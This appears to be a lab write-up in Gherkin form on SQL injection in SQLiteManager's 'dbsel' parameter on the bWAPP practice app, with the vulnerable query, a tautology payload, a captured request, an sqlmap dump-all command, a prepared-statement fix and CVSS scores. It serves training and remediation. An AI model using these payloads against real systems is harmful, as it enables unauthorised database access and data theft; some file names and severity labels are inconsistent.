## Version 1.4.1
## language: en

Feature: Sqlite Manager SQLi
  TOE:
    bWAPP
  Category:
    SQL Injection
  Location:
    http://192.168.1.119/sqlite/main.php - dbsel (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in
    an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared SQL statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | BurpSuite       | 1.7.36-56   |
    | Sqlmap          | 1.3.4       |
  TOE information:
    Given The site
    When I enter into it
    Then The aplication is an SQLiteManager version 1.2.4

  Scenario: Normal use case
    Given The site
    When An user enters into the site
    Then He can manages the databases

  Scenario: Static detection
    Given The source code
    When I see the SQL query
    """
    $tabInfoDb = $db->array_query("SELECT * FROM database WHERE id=$dbsel",
    SQLITE_ASSOC);
    """
    Then The "dbsel" parameter is concatenated directy inside the query
    And I have an SQLi vulnerability

  Scenario: Dynamic detection
    Given The site
    When I create a request with an SQL command
    """
    http://192.168.1.119/sqlite/main.php?dbsel=-1%20or%20%27a%27%20=%20%27a%27
    """
    Then I inject SQL commands
    And The commands are executed

  Scenario: Exploitation
    Given The site
    When I intercept the query with BurpSuite
    Then I can create a file "request.get" in which I save the request
    """
    GET /sqlite/main.php?dbsel=1&action=add_trigger HTTP/1.1
    Host: 192.168.1.119
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.119/sqlite/main.php?dbsel=1
    Cookie: security_level=0; PHPSESSID=067937fb8348da3410216b83f4bcf292
    Connection: close
    Upgrade-Insecure-Requests: 1
    """
    When I run a command using "sqlmap"
    """
    $ sqlmap -r request.req -p dbsel --level 5 --risk 3 --dump-all
    """
    Then I get information from the database [evidence](image1.png)
    And I exploit the SQL injection

  Scenario: Remediation
    Given The query
    When I use SQL prepared statements
    """
    $query = $conn->prepare("SELECT * FROM database WHERE id=?");
    $query->bind_param("i", $dbsel);
    """
    Then The commands are escaped
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.5/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.0/10 (High) - E:F/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      8.6/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-10-08
